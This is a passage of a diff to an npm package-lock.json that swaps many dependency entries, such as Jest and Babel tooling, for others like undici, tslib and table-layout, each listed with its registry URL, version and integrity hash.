"https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", "dev": true, + "dependencies": { + "escape-string-regexp": "^2.0.0" + }, "engines": { - "node": ">=8" + "node": ">=10" } }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", "dependencies": { - "color-convert": "^2.0.1" + "has-flag": "^4.0.0" }, "engines": { "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, + "node_modules/table-layout": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/table-layout/-/table-layout-4.1.1.tgz", + "integrity": "sha512-iK5/YhZxq5GO5z8wb0bY1317uDF3Zjpha0QFFLA8/trAoiLbQD0HUbMesEaxyzUgDxi2QlcbM8IvqOlEjgoXBA==", + "license": "MIT", "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" + "array-back": "^6.2.2", + "wordwrapjs": "^5.1.0" }, "engines": { - "node": ">= 8" + "node": ">=12.17" } }, - "node_modules/apache-arrow": { - "version": "19.0.1", - "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", - "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", - "license": "Apache-2.0", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, + "license": "MIT", "dependencies": { - "@swc/helpers": "^0.5.11", - "@types/command-line-args": "^5.2.3", - "@types/command-line-usage": "^5.0.4", - "@types/node": "^20.13.0", - "command-line-args": "^6.0.1", - "command-line-usage": "^7.0.1", - "flatbuffers": "^24.3.25", - "json-bignum": "^0.0.3", - "tslib": "^2.6.2" + "is-number": "^7.0.0" }, - "bin": { - "arrow2csv": "bin/arrow2csv.js" + "engines": { + "node": ">=8.0" } }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } + "node_modules/tslib": { + "version": "2.8.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz", + "integrity": "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==", + "license": "0BSD" }, - "node_modules/array-back": { - "version": "6.2.2", - "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", - "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==", + "node_modules/typical": { + "version": "7.3.0", + "resolved": "https://registry.npmjs.org/typical/-/typical-7.3.0.tgz", + "integrity": "sha512-ya4mg/30vm+DOWfBg4YK3j2WD6TWtRkCbasOJr40CseYENzCUby/7rIvXA99JGsQHeNxLbnXdyLLxKSv3tauFw==", "license": "MIT", "engines": { "node": ">=12.17" } }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, + "node_modules/undici": { + "version": "6.21.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.21.3.tgz", + "integrity": "sha512-gBLkYIlEnSp8pFbT64yFgGE6UIB9tAkhukC23PmMDCe5Nd+cRqKxSjw5y54MK2AZMgZfJWMaNE4nYUHgi1XEOw==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" + "node": ">=18.17" } }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", - "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", - "dev": true, - "dependencies": { - "fill-range": "^7.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001517", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001517.tgz", - "integrity": "sha512-Vdhm5S11DaFVLlyiKu4hiUTkpZu+y1KA/rZZqVQfOD5YdDT/eQKlkt7NaE0WGOFgX32diqt9MiP9CAiFeRklaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/chalk-template": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", - "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", - "license": "MIT", - "dependencies": { - "chalk": "^4.1.2" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/chalk-template?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/command-line-args": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", - "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "find-replace": "^5.0.2", - "lodash.camelcase": "^4.3.0", - "typical": "^7.2.0" - }, - "engines": { - "node": ">=12.20" - }, - "peerDependencies": { - "@75lb/nature": "latest" - }, - "peerDependenciesMeta": { - "@75lb/nature": { - "optional": true - } - } - }, - "node_modules/command-line-usage": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", - "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", - "license": "MIT", - "dependencies": { - "array-back": "^6.2.2", - "chalk-template": "^0.4.0", - "table-layout": "^4.1.0", - "typical": "^7.1.1" - }, - "engines": { - "node": ">=12.20.0" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } + "node_modules/undici-types": { + "version": "6.19.8", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", + "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", + "license": "MIT" }, - "node_modules/debug": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", - "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "node_modules/wordwrapjs": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/wordwrapjs/-/wordwrapjs-5.1.0.tgz", + "integrity": "sha512-JNjcULU2e4KJwUNv6CHgI46UvDGitb6dGryHajXTDiLgg1/RiGoPSDw4kZfYnwGtEXf2ZMeIewDQgFGzkCB2Sg==", "license": "MIT", - "dependencies": { - "ms": "^2.1.3" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.470", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.470.tgz", - "integrity": "sha512-zZM48Lmy2FKWgqyvsX9XK+J6FfP7aCDUFLmgooLJzA7v1agCs/sxSoBpTIwDLhmbhpx9yJIxj2INig/ncjJRqg==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-replace": { - "version": "5.0.2", - "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", - "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", - "license": "MIT", - "engines": { - "node": ">=14" - }, - "peerDependencies": { - "@75lb/nature": "latest" - }, - "peerDependenciesMeta": { - "@75lb/nature": { - "optional": true - } - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/flatbuffers": { - "version": "24.12.23", - "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", - "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==", - "license": "Apache-2.0" - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", 